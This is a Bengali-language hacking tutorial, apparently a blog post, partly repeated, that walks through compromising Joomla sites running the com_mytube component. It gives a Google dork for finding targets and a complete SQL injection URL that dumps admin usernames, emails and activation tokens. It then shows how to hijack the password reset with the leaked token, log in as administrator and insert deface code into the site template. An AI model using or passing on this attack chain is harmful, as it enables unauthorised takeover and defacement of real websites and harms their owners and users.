আমি Lost Project চলে আসলাম আপনাদের মাঝে ।।
আমি এবার দেখাব কিভাবে জুমলা সাইট হ্যাক করবেন ।। ইমেজ সহঃ
কথা না বারিয়ে দ্রুত কাজ সুরু করে দিয় ।
নিচের মত হবে সাইটটির এড্রেস ;
উপরে ইমেজ এ username, email and activation code <———-
এই পেজ টি ওপেন রেখে অন্য একতা ট্যাব ওপেন করুন –>
এখানে আমরা উপরের যেই ইমেইল টা পেয়েসি সেই টা দিব —–>
এবার Submit করুন ।
এর পর Activation কোড টা Reset হয়ে যাবে । < যেই টা আমরা প্রথম ধাপ টা করে পেয়েসি >
প্রথম ট্যাব এ ফিরে আসুন যেই টা প্রথম ওপেন করে রেখে দিয়েসেন ।;
এবার পেজ টা একবার Refresh করুন ।
নতুন Activation code টা কপি করে Token এর ঘরে দিন , ইউজার নেম <এ প্রথম ট্যাব থেকে পাওয়া ইউজার নেম পাওয়া > নাম টা দিন ।
এই রকম activation code দেখলে তাহলে অন্য সাইট খুজুন -> $1$14411
তার পর নিচের URL টা সাইট টার সাথে লাগিয়ে দিন ।।
এবার ইউজার নেম এবং পাস দিয়ে লগ ইন করুন ।। ওয়াও !! গ্রেট ।
এবার Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save কাজ শেষ ।
বিদায় নিতে বাধ্য হলাম আরও কিছু লিখার ইচ্ছা ছিল পারলাম না ।।
সবার সুস্থ সুন্দর জীবন কামনা করি …। ।
__Lost Project —>
আমি এবার দেখাব কিভাবে জুমলা সাইট হ্যাক করবেন ।। ইমেজ সহঃ
কথা না বারিয়ে দ্রুত কাজ সুরু করে দিয় ।
বিঃদ্রঃ দয়া করে আমার লিখা কোন কিছু খারাপ কাজে ব্যবহার করবেন না ।। আপনার কোন কিছুর জন্য আমি দায়ি থাকব না -><-
Finding Exploit and Target
প্রথমে নিচের Google Dork টা দিয়ে গুগল এ সার্চ দিনঃinurl:”option=com_mytube”গুগল আপনাকে অনেক সাইট আর সন্ধান দিবে । একটাকে লক্ষ বানিয়ে নিন ।
নিচের মত হবে সাইটটির এড্রেস ;
http://targetsite.com/index.php?option=com_mytube&Itemid=88…এবার সাইট এর URL এর সাথে নিচের URL টি পরিবর্তন করুন –>
/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62–এই রকম হবে ঃ
http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62–যদি আপনার টার্গেট সাইট টি vulnerable হয় তাহলে নিচের মত দেখতে পাবেন পেজ টি তে –>
উপরে ইমেজ এ username, email and activation code <———-
এই পেজ টি ওপেন রেখে অন্য একতা ট্যাব ওপেন করুন –>
Admin password reset
এবার সুধু সাইট টির এড্রেস টা নিয়ের নিচের মত URL এর শেষে নিচের URL টি পরিবর্তন করুনঃ —->/index.php?option=com_user&view=resetনিচের মতঃ ——>
http://www.targetsite.com/index.php?option=com_user&view=reset <————-This is standard Joomla query for password reset request
এবার Submit করুন ।
এর পর Activation কোড টা Reset হয়ে যাবে । < যেই টা আমরা প্রথম ধাপ টা করে পেয়েসি >
প্রথম ট্যাব এ ফিরে আসুন যেই টা প্রথম ওপেন করে রেখে দিয়েসেন ।;
এবার পেজ টা একবার Refresh করুন ।
নতুন Activation code টা কপি করে Token এর ঘরে দিন , ইউজার নেম <এ প্রথম ট্যাব থেকে পাওয়া ইউজার নেম পাওয়া > নাম টা দিন ।
এই রকম activation code দেখলে তাহলে অন্য সাইট খুজুন -> $1$14411
Admin Login
যদি সব কিছু ঠিক থাকে তাহলে নিচের মত Password এর পেজ আসবে নতুন Password দিন ।তার পর নিচের URL টা সাইট টার সাথে লাগিয়ে দিন ।।
administrator/এই রকম ঃ
http://www.targetsite.com/administrator/
এবার ইউজার নেম এবং পাস দিয়ে লগ ইন করুন ।। ওয়াও !! গ্রেট ।
এবার Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save কাজ শেষ ।
বিদায় নিতে বাধ্য হলাম আরও কিছু লিখার ইচ্ছা ছিল পারলাম না ।।
সবার সুস্থ সুন্দর জীবন কামনা করি …। ।
__Lost Project —>
